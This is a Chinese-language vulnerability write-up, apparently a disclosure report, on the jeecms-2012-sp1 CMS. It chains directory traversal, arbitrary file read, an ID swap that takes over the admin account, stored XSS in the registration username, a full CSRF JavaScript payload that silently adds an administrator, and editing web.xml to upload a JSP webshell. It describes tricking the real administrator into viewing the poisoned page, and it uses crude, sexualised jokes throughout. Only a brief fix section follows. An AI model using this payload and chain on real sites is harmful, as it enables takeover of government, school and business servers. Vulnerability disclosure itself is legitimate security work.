今晚花了4个小时去研究了一下jeecms,来看看一个xss如何变种webshell的
测试版本：jeecms-2012-sp1
官网:http://www.jeecms.com

jeecms这个基于java开发的cms系统无比强大，现在已开源，有很多政府，学校，商业机构在使用，危害还是相当的大

白帽子们，拿出你们的末日day，放出来吧
详细说明：
我们直接进入主题

1.跨目录，跨权限，跨妹子
到jeecms官网演示站后台，瞧一瞧，目测到跨目录问题
直接浏览服务器根目录

 

由于家里网速较卡，而且官网演示站，很多功能被限制，我下载到本地搭建环境测试，继续

任意文件下载

 

任意文件读取

 

2.这个我也不知道咋回事，我真的不知道，怎么可以修改别人的密码
创建一个res管理员

只能查看管理自己这个账号

拦截数据库包修改

将我自己这个管理员的编号id 8 修改成admin的id 1

 

 

发包，尼玛世界末日来了，我看见admin那妹子的账号了

 

昨天约妹子，和我吃个饭，不刁我的，看我改你密码，嘿嘿

 

登录一下妹子的账号admin

 

 

哈哈，成功进入，这下妹子，肯定要主动请我吃饭了，嘎嘎

好吧，我又在yy了，屌丝伤不起，活跃下气氛

go on........

3.我在思考

我在思考，这些东西的利用条件都要知道后台管理账号密码，利用还是比较困难
于是我想利用前段的留言评论，看能不能xss或者csrf
最后测试了一下，都过滤了，我伤心了

4.奇迹出现，大战即将开始

到前台看了下，到前台，必看注册

我还是在想xss妹子，最近找她太多，她烦我了，今天碰碰运气，看她理我不

这回我才xss妹子藏在注册用户名上

 

果断burpsuite拦截数据，将xss妹子请出来

 

奇迹，这次xss妹子，出来见我了

xss妹子，还在后台分身和admin妹子开玩笑

 


 

xss妹子说躲在后面给我把admin妹子骗过来，我太兴奋了，看了一下长度100
嘎嘎，天助我泡妹子耶

 

xss妹子说,光她一个人拿不下admin妹子，叫我喊csrf妹子来帮忙

但是csrf妹子说了叫我摸清后面添加管理员或者，修改管理妹子的基本参数和提交方法(get,post）

于是我去摸摸底
找到了，添加管理的，基本参数，请求方法

 

于是为了进去后台拿下管理妹子，我写了一个javascript post提交，添加管理

<script type="text/javascript">
 var xmlHttp=null;
 function createXMLHttpRequest(){
 if(window.XMLHttpRequest){
  xmlHttp=new XMLHttpRequest();
 }
 else{
  try{
    xmlHttp=new ActiveXObject("Msxml2.XMLHTTP");
    
   }catch(ex){
   
    xmlHttp=new ActiveXObject("Microsoft.XMLHTTP");
   } 
  }
 }
 
 function sendRequest(){
  //1.创建请求
  if(xmlHttp==null)
  {
  
   createXMLHttpRequest();
  }
  var data="username=csrf&email=csrf@shack2.org&password=csrf&groupId=1&rank=5&realname=&gender=&selfAdmin=false&viewonlyAdmin=false&roleIds=1&siteIds=1&steps=1&allChannels=true";
  xmlHttp.open("post","/jeeadmin/jeecms/admin_global/o_save.do",true);
  //3.发送请求
  xmlHttp.setRequestHeader("Context-Type","application/x-www-form-urlencoded");
  xmlHttp.send(data);
 
 }
</script>

哎，好久没写javascript，有点生疏了

写好，上传到了我的博客，待会调用

这里我就忽悠管理妹子，说我的密码忘了，还怎么怎么的，让他看会员管理，只要看了，就中招

 

成功打入妹子内部

 

5.拿到妹子整个系统控制权（webshell）

前面我们已经知道后台有任意文件下载，任意文件读取

其实这里还有任意文件上传，任意文件修改

由于有人作怪，把所有jsp请求全拦截了

所以我们要修改她的大脑web.xml

这里以前也有基友发过

WooYun: JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell

开始利用模版管理跨目录，修改web.xml

 

去掉对jsp的过滤器

 

再就是突破文件上传

这里模版功能很强大，上传jsp文件html后缀，然后改名成jsp后缀

利用跨目录，上传菜刀马儿到根目录

 

菜刀连接我的妹子

 
ok，终于控制到了我的妹子了

哎，重8点熬到现在，1点，5个小时

修复方案：
jeecms开源精神很好，希望再接再厉做好网站安全
建议在目录控制过滤掉../不让非跨目录读取
跨站xss没有过滤好，用户名这个这个地方，先别说跨后台管理妹子，跨其他用户也很爽额